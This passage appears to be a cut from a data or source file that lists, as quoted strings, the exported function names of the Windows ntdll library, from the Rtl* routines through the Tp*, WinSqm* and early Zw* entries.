"RtlCreateUnicodeStringFromAsciiz", "RtlCreateUserProcess", "RtlCreateUserSecurityObject", "RtlCreateUserStack", "RtlCreateUserThread", "RtlCreateVirtualAccountSid", "RtlCultureNameToLCID", "RtlCustomCPToUnicodeN", "RtlCutoverTimeToSystemTime", "RtlDeactivateActivationContext", "RtlDeactivateActivationContextUnsafeFast", "RtlDebugPrintTimes", "RtlDecodePointer", "RtlDecodeRemotePointer", "RtlDecodeSystemPointer", "RtlDeCommitDebugInfo", "RtlDecompressBuffer", "RtlDecompressBufferEx", "RtlDecompressFragment", "RtlDefaultNpAcl", "RtlDelete", "RtlDeleteAce", "RtlDeleteAtomFromAtomTable", "RtlDeleteBarrier", "RtlDeleteBoundaryDescriptor", "RtlDeleteCriticalSection", "RtlDeleteElementGenericTable", "RtlDeleteElementGenericTableAvl", "RtlDeleteElementGenericTableAvlEx", "RtlDeleteFunctionTable", "RtlDeleteGrowableFunctionTable", "RtlDeleteHashTable", "RtlDeleteNoSplay", "RtlDeleteOwnersRanges", "RtlDeleteRange", "RtlDeleteRegistryValue", "RtlDeleteResource", "RtlDeleteSecurityObject", "RtlDeleteTimer", "RtlDeleteTimerQueue", "RtlDeleteTimerQueueEx", "RtlDeleteUmsCompletionList", "RtlDeleteUmsThreadContext", "RtlDeNormalizeProcessParams", "RtlDequeueUmsCompletionListItems", "RtlDeregisterSecureMemoryCacheCallback", "RtlDeregisterWait", "RtlDeregisterWaitEx", "RtlDeriveCapabilitySidsFromName", "RtlDestroyAtomTable", "RtlDestroyEnvironment", "RtlDestroyHandleTable", "RtlDestroyHeap", "RtlDestroyMemoryBlockLookaside", "RtlDestroyMemoryZone", "RtlDestroyProcessParameters", "RtlDestroyQueryDebugBuffer", "RtlDetectHeapLeaks", "RtlDisableThreadProfiling", "RtlDispatchAPC", "RtlDllShutdownInProgress", "RtlDnsHostNameToComputerName", "RtlDowncaseUnicodeChar", "RtlDowncaseUnicodeString", "RtlDumpResource", "RtlDuplicateUnicodeString", "RtlEmptyAtomTable", "RtlEnableEarlyCriticalSectionEventCreation", "RtlEnableThreadProfiling", "RtlEncodePointer", "RtlEncodeRemotePointer", "RtlEncodeSystemPointer", "RtlEndEnumerationHashTable", "RtlEndStrongEnumerationHashTable", "RtlEndWeakEnumerationHashTable", "RtlEnlargedIntegerMultiply", "RtlEnlargedUnsignedDivide", "RtlEnlargedUnsignedMultiply", "RtlEnterCriticalSection", "RtlEnterUmsSchedulingMode", "RtlEnumerateEntryHashTable", "RtlEnumerateGenericTable", "RtlEnumerateGenericTableAvl", "RtlEnumerateGenericTableLikeADirectory", "RtlEnumerateGenericTableWithoutSplaying", "RtlEnumerateGenericTableWithoutSplayingAvl", "RtlEnumerateProperties", "RtlEnumProcessHeaps", "RtlEqualComputerName", "RtlEqualDomainName", "RtlEqualLuid", "RtlEqualPrefixSid", "RtlEqualSid", "RtlEqualString", "RtlEqualUnicodeString", "RtlEqualWnfChangeStamps", "RtlEraseUnicodeString", "RtlEthernetAddressToStringA", "RtlEthernetAddressToStringW", "RtlEthernetStringToAddressA", "RtlEthernetStringToAddressW", "RtlExecuteUmsThread", "RtlExitUserProcess", "RtlExitUserThread", "RtlExpandEnvironmentStrings", "RtlExpandHashTable", "RtlExtendedIntegerMultiply", "RtlExtendedLargeIntegerDivide", "RtlExtendedMagicDivide", "RtlExtendHeap", "RtlExtendMemoryBlockLookaside", "RtlExtendMemoryZone", "RtlExtractBitMap", "RtlFillMemory", "RtlFillMemoryUlong", "RtlFillMemoryUlonglong", "RtlFinalReleaseOutOfProcessMemoryStream", "RtlFindAceByType", "RtlFindActivationContextSectionGuid", "RtlFindActivationContextSectionString", "RtlFindCharInUnicodeString", "RtlFindClearBits", "RtlFindClearBitsAndSet", "RtlFindClearRuns", "RtlFindClosestEncodableLength", "RtlFindLastBackwardRunClear", "RtlFindLeastSignificantBit", "RtlFindLongestRunClear", "RtlFindLongestRunSet", "RtlFindMessage", "RtlFindMostSignificantBit", "RtlFindNextForwardRunClear", "RtlFindRange", "RtlFindSetBits", "RtlFindSetBitsAndClear", "RtlFindUnicodeSubstring", "RtlFirstEntrySList", "RtlFirstFreeAce", "RtlFlsAlloc", "RtlFlsFree", "RtlFlushHeaps", "RtlFlushPropertySet", "RtlFlushSecureMemoryCache", "RtlFormatCurrentUserKeyPath", "RtlFormatMessage", "RtlFormatMessageEx", "RtlFreeActivationContextStack", "RtlFreeAnsiString", "RtlFreeHandle", "RtlFreeHeap", "RtlFreeMemoryBlockLookaside", "RtlFreeOemString", "RtlFreeRangeList", "RtlFreeSid", "RtlFreeThreadActivationContextStack", "RtlFreeUnicodeString", "RtlFreeUserStack", "RtlFreeUserThreadStack", "RtlGenerate8dot3Name", "RtlGetAce", "RtlGetActiveActivationContext", "RtlGetAppContainerNamedObjectPath", "RtlGetAppContainerParent", "RtlGetAppContainerSidType", "RtlGetCallersAddress", "RtlGetCompressionWorkSpaceSize", "RtlGetControlSecurityDescriptor", "RtlGetCriticalSectionRecursionCount", "RtlGetCurrentPeb", "RtlGetCurrentProcessorNumber", "RtlGetCurrentProcessorNumberEx", "RtlGetCurrentTransaction", "RtlGetCurrentUmsThread", "RtlGetDaclSecurityDescriptor", "RtlGetDeviceFamilyInfoEnum", "RtlGetElementGenericTable", "RtlGetElementGenericTableAvl", "RtlGetEnabledExtendedFeatures", "RtlGetExepath", "RtlGetExtendedContextLength", "RtlGetExtendedFeaturesMask", "RtlGetFileMUIPath", "RtlGetFirstRange", "RtlGetFrame", "RtlGetFunctionTableListHead", "RtlGetGroupSecurityDescriptor", "RtlGetHandleValueHeap", "RtlGetHeapUserValue", "RtlGetIntegerAtom", "RtlGetInterruptTimePrecise", "RtlGetLastNtStatus", "RtlGetLastWin32Error", "RtlGetLengthWithoutLastFullDosOrNtPathElement", "RtlGetLengthWithoutTrailingPathSeperators", "RtlGetLocaleFileMappingAddress", "RtlGetLongestNtPathLength", "RtlGetNativeSystemInformation", "RtlGetNextEntryHashTable", "RtlGetNextRange", "RtlGetNextUmsListItem", "RtlGetNtGlobalFlags", "RtlGetNtProductType", "RtlGetNtVersionNumbers", "RtlGetOwnerSecurityDescriptor", "RtlGetParentLocaleName", "RtlGetProcessHeaps", "RtlGetProcessPreferredUILanguages", "RtlGetProductInfo", "RtlGetSaclSecurityDescriptor", "RtlGetSearchPath", "RtlGetSecurityDescriptorRMControl", "RtlGetSetBootStatusData", "RtlGetSystemPreferredUILanguages", "RtlGetSystemTimePrecise", "RtlGetThreadErrorMode", "RtlGetThreadLangIdByIndex", "RtlGetThreadPreferredUILanguages", "RtlGetUILanguageInfo", "RtlGetUmsCompletionListEvent", "RtlGetUnloadEventTrace", "RtlGetUnloadEventTraceEx", "RtlGetUserInfoHeap", "RtlGetUserPreferredUILanguages", "RtlGetVersion", "RtlGrowFunctionTable", "RtlGUIDFromString", "RtlGuidToPropertySetName", "RtlHashUnicodeString", "RtlHeapTrkInitialize", "RtlIdentifierAuthoritySid", "RtlIdnToAscii", "RtlIdnToNameprepUnicode", "RtlIdnToUnicode", "RtlImageDirectoryEntryToData", "RtlImageNtHeader", "RtlImageNtHeaderEx", "RtlImageRvaToSection", "RtlImageRvaToVa", "RtlImpersonateLpcClient", "RtlImpersonateSelf", "RtlImpersonateSelfEx", "RtlInitAnsiString", "RtlInitAnsiStringEx", "RtlInitBarrier", "RtlInitCodePageTable", "RtlInitEnumerationHashTable", "RtlInitializeAtomPackage", "RtlInitializeBitMap", "RtlInitializeConditionVariable", "RtlInitializeContext", "RtlInitializeCriticalSection", "RtlInitializeCriticalSectionAndSpinCount", "RtlInitializeCriticalSectionEx", "RtlInitializeExceptionChain", "RtlInitializeExtendedContext", "RtlInitializeGenericTable", "RtlInitializeGenericTableAvl", "RtlInitializeHandleTable", "RtlInitializeNtUserPfn", "RtlInitializeProfile", "RtlInitializeRangeList", "RtlInitializeResource", "RtlInitializeRXact", "RtlInitializeSid", "RtlInitializeSidEx", "RtlInitializeSListHead", "RtlInitializeSRWLock", "RtlInitializeStackTraceDataBase", "RtlInitMemoryStream", "RtlInitNlsTables", "RtlInitOutOfProcessMemoryStream", "RtlInitString", "RtlInitStringEx", "RtlInitStrongEnumerationHashTable", "RtlInitUnicodeString", "RtlInitUnicodeStringEx", "RtlInitWeakEnumerationHashTable", "RtlInsertElementGenericTable", "RtlInsertElementGenericTableAvl", "RtlInsertElementGenericTableFull", "RtlInsertElementGenericTableFullAvl", "RtlInsertEntryHashTable", "RtlInstallFunctionTableCallback", "RtlInt64ToUnicodeString", "RtlIntegerToChar", "RtlIntegerToUnicodeString", "RtlInterlockedClearBitRun", "RtlInterlockedCompareExchange64", "RtlInterlockedFlushSList", "RtlInterlockedPopEntrySList", "RtlInterlockedPushEntrySList", "RtlInterlockedPushListSList", "RtlInterlockedPushListSListEx", "RtlInterlockedSetBitRun", "RtlInvertRangeList", "RtlIoDecodeMemIoResource", "RtlIoEncodeMemIoResource", "RtlIpv4AddressToStringA", "RtlIpv4AddressToStringExA", "RtlIpv4AddressToStringExW", "RtlIpv4AddressToStringW", "RtlIpv4StringToAddressA", "RtlIpv4StringToAddressExA", "RtlIpv4StringToAddressExW", "RtlIpv4StringToAddressW", "RtlIpv6AddressToStringA", "RtlIpv6AddressToStringExA", "RtlIpv6AddressToStringExW", "RtlIpv6AddressToStringW", "RtlIpv6StringToAddressA", "RtlIpv6StringToAddressExA", "RtlIpv6StringToAddressExW", "RtlIpv6StringToAddressW", "RtlIsActivationContextActive", "RtlIsCapabilitySid", "RtlIsCriticalSectionLocked", "RtlIsCriticalSectionLockedByThread", "RtlIsCurrentThreadAttachExempt", "RtlIsGenericTableEmpty", "RtlIsGenericTableEmptyAvl", "RtlIsMultiSessionSku", "RtlIsNameInExpression", "RtlIsNameLegalDOS8Dot3", "RtlIsNormalizedString", "RtlIsPackageSid", "RtlIsParentOfChildAppContainer", "RtlIsProcessorFeaturePresent", "RtlIsRangeAvailable", "RtlIsTextUnicode", "RtlIsThreadWithinLoaderCallout", "RtlIsUntrustedObject", "RtlIsValidHandle", "RtlIsValidIndexHandle", "RtlIsValidLocaleName", "RtlIsValidProcessTrustLabelSid", "RtlKnownExceptionFilter", "RtlLargeIntegerAdd", "RtlLargeIntegerArithmeticShift", "RtlLargeIntegerDivide", "RtlLargeIntegerNegate", "RtlLargeIntegerShiftLeft", "RtlLargeIntegerShiftRight", "RtlLargeIntegerSubtract", "RtlLargeIntegerToChar", "RtlLCIDToCultureName", "RtlLcidToLocaleName", "RtlLeaveCriticalSection", "RtlLengthRequiredSid", "RtlLengthSecurityDescriptor", "RtlLengthSid", "RtlLengthSidAsUnicodeString", "RtlLoadString", "RtlLocaleNameToLcid", "RtlLocalTimeToSystemTime", "RtlLocateExtendedFeature", "RtlLocateLegacyContext", "RtlLockBootStatusData", "RtlLockCurrentThread", "RtlLockHeap", "RtlLockMemoryBlockLookaside", "RtlLockMemoryStreamRegion", "RtlLockMemoryZone", "RtlLockModuleSection", "RtlLogStackBackTrace", "RtlLookupAtomInAtomTable", "RtlLookupElementGenericTable", "RtlLookupElementGenericTableAvl", "RtlLookupElementGenericTableFull", "RtlLookupElementGenericTableFullAvl", "RtlLookupEntryHashTable", "RtlLookupFunctionEntry", "RtlLookupFunctionTable", "RtlLookupSymbolByAddress", "RtlLookupSymbolByName", "RtlMakeSelfRelativeSD", "RtlMapGenericMask", "RtlMapSecurityErrorToNtStatus", "RtlMergeRangeLists", "RtlMoveMemory", "RtlMultiAppendUnicodeStringBuffer", "RtlMultiByteToUnicodeN", "RtlMultiByteToUnicodeSize", "RtlMultipleAllocateHeap", "RtlMultipleFreeHeap", "RtlNewInstanceSecurityObject", "RtlNewSecurityGrantedAccess", "RtlNewSecurityObject", "RtlNewSecurityObjectEx", "RtlNewSecurityObjectWithMultipleInheritance", "RtlNormalizeProcessParams", "RtlNormalizeString", "RtlNtdllName", "RtlNtPathNameToDosPathName", "RtlNtStatusToDosError", "RtlNtStatusToDosErrorNoTeb", "RtlNumberGenericTableElements", "RtlNumberGenericTableElementsAvl", "RtlNumberOfClearBits", "RtlNumberOfClearBitsInRange", "RtlNumberOfSetBits", "RtlNumberOfSetBitsInRange", "RtlNumberOfSetBitsUlongPtr", "RtlOemStringToUnicodeSize", "RtlOemStringToUnicodeString", "RtlOemToUnicodeN", "RtlOnMappedStreamEvent", "RtlOpenCurrentUser", "RtlOsDeploymentState", "RtlOwnerAcesPresent", "RtlpApplyLengthFunction", "RtlpCheckDynamicTimeZoneInformation", "RtlpCleanupRegistryKeys", "RtlpConvertAbsoluteToRelativeSecurityAttribute", "RtlpConvertCultureNamesToLCIDs", "RtlpConvertLCIDsToCultureNames", "RtlpConvertRelativeToAbsoluteSecurityAttribute", "RtlpCreateProcessRegistryInfo", "RtlPcToFileHeader", "RtlpEnsureBufferSize", "RtlpExecuteUmsThread", "RtlpFreezeTimeBias", "RtlpGetDeviceFamilyInfoEnum", "RtlpGetLCIDFromLangInfoNode", "RtlpGetNameFromLangInfoNode", "RtlpGetSystemDefaultUILanguage", "RtlpGetUserOrMachineUILanguage4NLS", "RtlPinAtomInAtomTable", "RtlpInitializeLangRegistryInfo", "RtlpInitializeRtl", "RtlpInterlockedPopEntrySeqSListEnd", "RtlpInterlockedPopEntrySeqSListFault", "RtlpInterlockedPopEntrySeqSListResume", "RtlpIsQualifiedLanguage", "RtlpLoadMachineUIByPolicy", "RtlpLoadUserUIByPolicy", "RtlpMergeSecurityAttributeInformation", "RtlpMuiFreeLangRegistryInfo", "RtlpMuiRegCreateRegistryInfo", "RtlpMuiRegFreeRegistryInfo", "RtlpMuiRegLoadRegistryInfo", "RtlpNotOwnerCriticalSection", "RtlpNtCreateKey", "RtlpNtEnumerateSubKey", "RtlpNtMakeTemporaryKey", "RtlpNtOpenKey", "RtlpNtQueryValueKey", "RtlpNtSetValueKey", "RtlPopFrame", "RtlpQueryDefaultUILanguage", "RtlpQueryProcessDebugInformationFromWow64", "RtlpQueryProcessDebugInformationRemote", "RtlPrefixString", "RtlPrefixUnicodeString", "RtlpRefreshCachedUILanguage", "RtlPrepareForProcessCloning", "RtlProcessFlsData", "RtlPropertySetNameToGuid", "RtlProtectHeap", "RtlpSetInstallLanguage", "RtlpSetPreferredUILanguages", "RtlpSetUserPreferredUILanguages", "RtlPublishWnfStateData", "RtlpUmsExecuteYieldThreadEnd", "RtlpUmsThreadYield", "RtlpUnWaitCriticalSection", "RtlPushFrame", "RtlpVerifyAndCommitUILanguageSettings", "RtlpWaitForCriticalSection", "RtlpWnfNotificationThread", "RtlQueryActivationContextApplicationSettings", "RtlQueryAtomInAtomTable", "RtlQueryCriticalSectionOwner", "RtlQueryDepthSList", "RtlQueryDynamicTimeZoneInformation", "RtlQueryElevationFlags", "RtlQueryEnvironmentVariable", "RtlQueryHeapInformation", "RtlQueryInformationAcl", "RtlQueryInformationActivationContext", "RtlQueryInformationActiveActivationContext", "RtlQueryInterfaceMemoryStream", "RtlQueryModuleInformation", "RtlQueryPackageClaims", "RtlQueryPackageIdentity", "RtlQueryPackageIdentityEx", "RtlQueryPerformanceCounter", "RtlQueryPerformanceFrequency", "RtlQueryProcessBackTraceInformation", "RtlQueryProcessDebugInformation", "RtlQueryProcessHeapInformation", "RtlQueryProcessLockInformation", "RtlQueryProperties", "RtlQueryPropertyNames", "RtlQueryPropertySet", "RtlQueryProtectedPolicy", "RtlQueryRegistryValues", "RtlQueryRegistryValuesEx", "RtlQueryResourcePolicy", "RtlQuerySecurityObject", "RtlQueryTagHeap", "RtlQueryThreadProfiling", "RtlQueryTimeZoneInformation", "RtlQueryUmsThreadInformation", "RtlQueryUnbiasedInterruptTime", "RtlQueryValidationRunlevel", "RtlQueryWnfMetaNotification", "RtlQueryWnfStateData", "RtlQueryWnfStateDataWithExplicitScope", "RtlQueueApcWow64Thread", "RtlQueueWorkItem", "RtlRaiseException", "RtlRaiseStatus", "RtlRandom", "RtlRandomEx", "RtlRbInsertNodeEx", "RtlRbRemoveNode", "RtlReadMemoryStream", "RtlReadOutOfProcessMemoryStream", "RtlReadThreadProfilingData", "RtlReAllocateHeap", "RtlRealPredecessor", "RtlRealSuccessor", "RtlRegisterForWnfMetaNotification", "RtlRegisterSecureMemoryCacheCallback", "RtlRegisterThreadWithCsrss", "RtlRegisterWait", "RtlReleaseActivationContext", "RtlReleaseMemoryStream", "RtlReleasePath", "RtlReleasePebLock", "RtlReleasePrivilege", "RtlReleaseRelativeName", "RtlReleaseResource", "RtlReleaseSRWLockExclusive", "RtlReleaseSRWLockShared", "RtlRemoteCall", "RtlRemoveEntryHashTable", "RtlRemovePrivileges", "RtlRemoveVectoredContinueHandler", "RtlRemoveVectoredExceptionHandler", "RtlReplaceSidInSd", "RtlReportException", "RtlReportSilentProcessExit", "RtlReportSqmEscalation", "RtlResetMemoryBlockLookaside", "RtlResetMemoryZone", "RtlResetNtUserPfn", "RtlResetRtlTranslations", "RtlRestoreContext", "RtlRestoreLastWin32Error", "RtlRetrieveNtUserPfn", "RtlRevertMemoryStream", "RtlRunDecodeUnicodeString", "RtlRunEncodeUnicodeString", "RtlRunOnceBeginInitialize", "RtlRunOnceComplete", "RtlRunOnceExecuteOnce", "RtlRunOnceInitialize", "RtlSecondsSince1970ToTime", "RtlSecondsSince1980ToTime", "RtlSeekMemoryStream", "RtlSelfRelativeToAbsoluteSD", "RtlSelfRelativeToAbsoluteSD2", "RtlSendMsgToSm", "RtlSetAllBits", "RtlSetAttributesSecurityDescriptor", "RtlSetBit", "RtlSetBits", "RtlSetControlSecurityDescriptor", "RtlSetCriticalSectionSpinCount", "RtlSetCurrentEnvironment", "RtlSetCurrentTransaction", "RtlSetDaclSecurityDescriptor", "RtlSetDynamicTimeZoneInformation", "RtlSetEnvironmentStrings", "RtlSetEnvironmentVar", "RtlSetEnvironmentVariable", "RtlSetExtendedFeaturesMask", "RtlSetGroupSecurityDescriptor", "RtlSetHandleValueHeap", "RtlSetHeapInformation", "RtlSetHeapUserValue", "RtlSetInformationAcl", "RtlSetIoCompletionCallback", "RtlSetLastWin32Error", "RtlSetLastWin32ErrorAndNtStatusFromNtStatus", "RtlSetMemoryStreamSize", "RtlSetOwnerSecurityDescriptor", "RtlSetPortableOperatingSystem", "RtlSetProcessDebugInformation", "RtlSetProcessIsCritical", "RtlSetProcessPreferredUILanguages", "RtlSetProperties", "RtlSetPropertyNames", "RtlSetPropertySetClassId", "RtlSetProtectedPolicy", "RtlSetSaclSecurityDescriptor", "RtlSetSearchPathMode", "RtlSetSecurityDescriptorRMControl", "RtlSetSecurityObject", "RtlSetSecurityObjectEx", "RtlSetThreadErrorMode", "RtlSetThreadIsCritical", "RtlSetThreadPoolStartFunc", "RtlSetThreadPreferredUILanguages", "RtlSetThreadSubProcessTag", "RtlSetTimer", "RtlSetTimeZoneInformation", "RtlSetUmsThreadInformation", "RtlSetUnhandledExceptionFilter", "RtlSetUnicodeCallouts", "RtlSetUserCallbackExceptionFilter", "RtlSetUserFlagsHeap", "RtlSetUserValueHeap", "RtlShutdownLpcServer", "RtlSidDominates", "RtlSidDominatesForTrust", "RtlSidEqualLevel", "RtlSidHashInitialize", "RtlSidHashLookup", "RtlSidIsHigherLevel", "RtlSizeHeap", "RtlSleepConditionVariableCS", "RtlSleepConditionVariableSRW", "RtlSnapshotHeap", "RtlSplay", "RtlStartProfile", "RtlStartRXact", "RtlStatMemoryStream", "RtlStopProfile", "RtlStringFromGUID", "RtlStringFromGUIDEx", "RtlStronglyEnumerateEntryHashTable", "RtlSubAuthorityCountSid", "RtlSubAuthoritySid", "RtlSubscribeWnfStateChangeNotification", "RtlSubtreePredecessor", "RtlSubtreeSuccessor", "RtlSwitchedVVI", "RtlSystemTimeToLocalTime", "RtlTestAndPublishWnfStateData", "RtlTestBit", "RtlTestProtectedAccess", "RtlTimeFieldsToTime", "RtlTimeToElapsedTimeFields", "RtlTimeToSecondsSince1970", "RtlTimeToSecondsSince1980", "RtlTimeToTimeFields", "RtlTraceDatabaseAdd", "RtlTraceDatabaseCreate", "RtlTraceDatabaseDestroy", "RtlTraceDatabaseEnumerate", "RtlTraceDatabaseFind", "RtlTraceDatabaseLock", "RtlTraceDatabaseUnlock", "RtlTraceDatabaseValidate", "RtlTryAcquirePebLock", "RtlTryAcquireSRWLockExclusive", "RtlTryAcquireSRWLockShared", "RtlTryConvertSRWLockSharedToExclusiveOrRelease", "RtlTryEnterCriticalSection", "RtlUlongByteSwap", "RtlUlonglongByteSwap", "RtlUmsThreadYield", "RtlUnhandledExceptionFilter", "RtlUnhandledExceptionFilter2", "RtlUnicodeStringToAnsiSize", "RtlUnicodeStringToAnsiString", "RtlUnicodeStringToCountedOemString", "RtlUnicodeStringToInteger", "RtlUnicodeStringToOemSize", "RtlUnicodeStringToOemString", "RtlUnicodeToCustomCPN", "RtlUnicodeToMultiByteN", "RtlUnicodeToMultiByteSize", "RtlUnicodeToOemN", "RtlUnicodeToUTF8N", "RtlUniform", "RtlUnlockBootStatusData", "RtlUnlockCurrentThread", "RtlUnlockHeap", "RtlUnlockMemoryBlockLookaside", "RtlUnlockMemoryStreamRegion", "RtlUnlockMemoryZone", "RtlUnlockModuleSection", "RtlUnsubscribeWnfChangeNotification", "RtlUnsubscribeWnfNotificationWaitForCompletion", "RtlUnsubscribeWnfNotificationWithCompletionCallback", "RtlUnwind", "RtlUnwindEx", "RtlUpcaseUnicodeChar", "RtlUpcaseUnicodeString", "RtlUpcaseUnicodeStringToAnsiString", "RtlUpcaseUnicodeStringToCountedOemString", "RtlUpcaseUnicodeStringToOemString", "RtlUpcaseUnicodeToCustomCPN", "RtlUpcaseUnicodeToMultiByteN", "RtlUpcaseUnicodeToOemN", "RtlUpdateClonedCriticalSection", "RtlUpdateClonedSRWLock", "RtlUpdateTimer", "RtlUpperChar", "RtlUpperString", "RtlUsageHeap", "RtlUserThreadStart", "RtlUshortByteSwap", "RtlUTF8ToUnicodeN", "RtlValidAcl", "RtlValidateHeap", "RtlValidateProcessHeaps", "RtlValidateUnicodeString", "RtlValidProcessProtection", "RtlValidRelativeSecurityDescriptor", "RtlValidSecurityDescriptor", "RtlValidSid", "RtlVerifyVersionInfo", "RtlVirtualUnwind", "RtlWaitForWnfMetaNotification", "RtlWaitOnAddress", "RtlWakeAddressAll", "RtlWakeAddressAllNoFence", "RtlWakeAddressSingle", "RtlWakeAddressSingleNoFence", "RtlWakeAllConditionVariable", "RtlWakeConditionVariable", "RtlWalkFrameChain", "RtlWalkHeap", "RtlWeaklyEnumerateEntryHashTable", "RtlWerpReportException", "RtlWnfCompareChangeStamp", "RtlWnfDllUnloadCallback", "RtlWow64CallFunction64", "RtlWow64EnableFsRedirection", "RtlWow64EnableFsRedirectionEx", "RtlWoW64GetCpuAreaInfo", "RtlWoW64GetCurrentCpuArea", "RtlWow64GetThreadContext", "RtlWow64GetThreadSelectorEntry", "RtlWow64LogMessageInEventLogger", "RtlWow64SetThreadContext", "RtlWow64SuspendThread", "RtlWow64SuspendThreadEx", "RtlWriteMemoryStream", "RtlWriteRegistryValue", "RtlxAnsiStringToUnicodeSize", "RtlxOemStringToUnicodeSize", "RtlxUnicodeStringToAnsiSize", "RtlxUnicodeStringToOemSize", "RtlZeroHeap", "RtlZeroMemory", "RtlZombifyActivationContext", "SaveEm87Context", "SbExecuteProcedure", "SbSelectProcedure", "SbtDisableForCurrentProcess", "SbtLogDllMapping", "SbtLogExeInitializing", "SbtLogSystemUsageByParent", "SbtLogSystemUsageByStack", "ShipAssert", "ShipAssertGetBufferInfo", "ShipAssertMsgA", "ShipAssertMsgW", "sin", "sprintf", "sqrt", "sscanf", "strcat", "strchr", "strcmp", "strcpy", "strcspn", "strlen", "strncat", "strncmp", "strncpy", "strnlen", "strpbrk", "strrchr", "strspn", "strstr", "strtol", "strtoul", "swprintf", "tan", "tolower", "toupper", "towlower", "towupper", "TpAllocAlpcCompletion", "TpAllocAlpcCompletionEx", "TpAllocCleanupGroup", "TpAllocIoCompletion", "TpAllocJobNotification", "TpAllocPool", "TpAllocTimer", "TpAllocWait", "TpAllocWork", "TpAlpcRegisterCompletionList", "TpAlpcUnregisterCompletionList", "TpCallbackDetectedUnrecoverableError", "TpCallbackIndependent", "TpCallbackLeaveCriticalSectionOnCompletion", "TpCallbackMayRunLong", "TpCallbackReleaseMutexOnCompletion", "TpCallbackReleaseSemaphoreOnCompletion", "TpCallbackSendAlpcMessageOnCompletion", "TpCallbackSendPendingAlpcMessage", "TpCallbackSetEventOnCompletion", "TpCallbackUnloadDllOnCompletion", "TpCancelAsyncIoOperation", "TpCaptureCaller", "TpCheckTerminateWorker", "TpDbgDumpHeapUsage", "TpDbgGetFreeInfo", "TpDbgSetLogRoutine", "TpDisablePoolCallbackChecks", "TpDisassociateCallback", "TpIsTimerSet", "TpPoolFreeUnusedNodes", "TpPostWork", "TpQueryPoolStackInformation", "TpReleaseAlpcCompletion", "TpReleaseCleanupGroup", "TpReleaseCleanupGroupMembers", "TpReleaseIoCompletion", "TpReleaseJobNotification", "TpReleasePool", "TpReleaseTimer", "TpReleaseWait", "TpReleaseWork", "TpSetDefaultPoolMaxThreads", "TpSetDefaultPoolStackInformation", "TpSetPoolMaxThreads", "TpSetPoolMaxThreadsSoftLimit", "TpSetPoolMinThreads", "TpSetPoolStackInformation", "TpSetPoolThreadBasePriority", "TpSetPoolWorkerThreadIdleTimeout", "TpSetTimer", "TpSetTimerEx", "TpSetWait", "TpSetWaitEx", "TpSimpleTryPost", "TpStartAsyncIoOperation", "TpTimerOutstandingCallbackCount", "TpTrimPools", "TpWaitForAlpcCompletion", "TpWaitForIoCompletion", "TpWaitForJobNotification", "TpWaitForTimer", "TpWaitForWait", "TpWaitForWork", "vDbgPrintEx", "vDbgPrintExWithPrefix", "VerSetConditionMask", "vsprintf", "wcscat", "wcschr", "wcscmp", "wcscpy", "wcscspn", "wcslen", "wcsncat", "wcsncmp", "wcsncpy", "wcsnlen", "wcspbrk", "wcsrchr", "wcsspn", "wcsstr", "wcstok", "wcstol", "wcstombs", "wcstoul", "WerCheckEventEscalation", "WerReportSQMEvent", "WerReportWatsonEvent", "WinSqmAddToAverageDWORD", "WinSqmAddToStream", "WinSqmAddToStreamEx", "WinSqmCheckEscalationAddToStreamEx", "WinSqmCheckEscalationSetDWORD", "WinSqmCheckEscalationSetDWORD64", "WinSqmCheckEscalationSetString", "WinSqmCommonDatapointDelete", "WinSqmCommonDatapointSetDWORD", "WinSqmCommonDatapointSetDWORD64", "WinSqmCommonDatapointSetStreamEx", "WinSqmCommonDatapointSetString", "WinSqmEndSession", "WinSqmEventEnabled", "WinSqmEventWrite", "WinSqmGetEscalationRuleStatus", "WinSqmGetInstrumentationProperty", "WinSqmIncrementDWORD", "WinSqmIsOptedIn", "WinSqmIsOptedInEx", "WinSqmIsSessionDisabled", "WinSqmSetDWORD", "WinSqmSetDWORD64", "WinSqmSetEscalationInfo", "WinSqmSetIfMaxDWORD", "WinSqmSetIfMinDWORD", "WinSqmSetString", "WinSqmStartSession", "WinSqmStartSessionForPartner", "WinSqmStartSqmOptinListener", "xRtlDosPathNameToNtPathName", "ZwAcceptConnectPort", "ZwAccessCheck", "ZwAccessCheckAndAuditAlarm", "ZwAccessCheckByType", "ZwAccessCheckByTypeAndAuditAlarm", "ZwAccessCheckByTypeResultList", "ZwAccessCheckByTypeResultListAndAuditAlarm", "ZwAccessCheckByTypeResultListAndAuditAlarmByHandle", "ZwAcquireCMFViewOwnership", "ZwAddAtom", "ZwAddAtomEx", "ZwAddBootEntry", "ZwAddDriverEntry", "ZwAdjustGroupsToken", "ZwAdjustPrivilegesToken", "ZwAdjustTokenClaimsAndDeviceGroups", "ZwAlertResumeThread", "ZwAlertThread", "ZwAlertThreadByThreadId", "ZwAllocateLocallyUniqueId", "ZwAllocateReserveObject", "ZwAllocateUserPhysicalPages", "ZwAllocateUuids", "ZwAllocateVirtualMemory", "ZwAlpcAcceptConnectPort", "ZwAlpcCancelMessage", "ZwAlpcConnectPort", "ZwAlpcConnectPortEx", "ZwAlpcCreatePort", "ZwAlpcCreatePortSection", "ZwAlpcCreateResourceReserve", "ZwAlpcCreateSectionView", "ZwAlpcCreateSecurityContext", "ZwAlpcDeletePortSection", "ZwAlpcDeleteResourceReserve", "ZwAlpcDeleteSectionView", "ZwAlpcDeleteSecurityContext", "ZwAlpcDisconnectPort", "ZwAlpcImpersonateClientContainerOfPort", "ZwAlpcImpersonateClientOfPort", "ZwAlpcOpenSenderProcess", "ZwAlpcOpenSenderThread", "ZwAlpcQueryInformation", "ZwAlpcQueryInformationMessage", "ZwAlpcRevokeSecurityContext", "ZwAlpcSendWaitReceivePort", "ZwAlpcSetInformation", "ZwApphelpCacheControl", "ZwAreMappedFilesTheSame", "ZwAssignProcessToJobObject", "ZwAssociateWaitCompletionPacket", "ZwCallbackReturn", "ZwCancelDeviceWakeupRequest", "ZwCancelIoFile", "ZwCancelIoFileEx", "ZwCancelSynchronousIoFile", "ZwCancelTimer", "ZwCancelTimer2", "ZwCancelWaitCompletionPacket", "ZwClearAllSavepointsTransaction", "ZwClearEvent", "ZwClearSavepointTransaction", "ZwClose", "ZwCloseObjectAuditAlarm", "ZwCommitComplete", "ZwCommitEnlistment", "ZwCommitTransaction", "ZwCompactKeys", "ZwCompareObjects", "ZwCompareTokens", "ZwCompleteConnectPort", "ZwCompressKey", "ZwConnectPort", "ZwContinue", "ZwCreateChannel", "ZwCreateDebugObject", "ZwCreateDirectoryObject", "ZwCreateDirectoryObjectEx", "ZwCreateEnlistment", "ZwCreateEvent", "ZwCreateEventPair", "ZwCreateFile", "ZwCreateIoCompletion", "ZwCreateIRTimer", "ZwCreateJobObject", 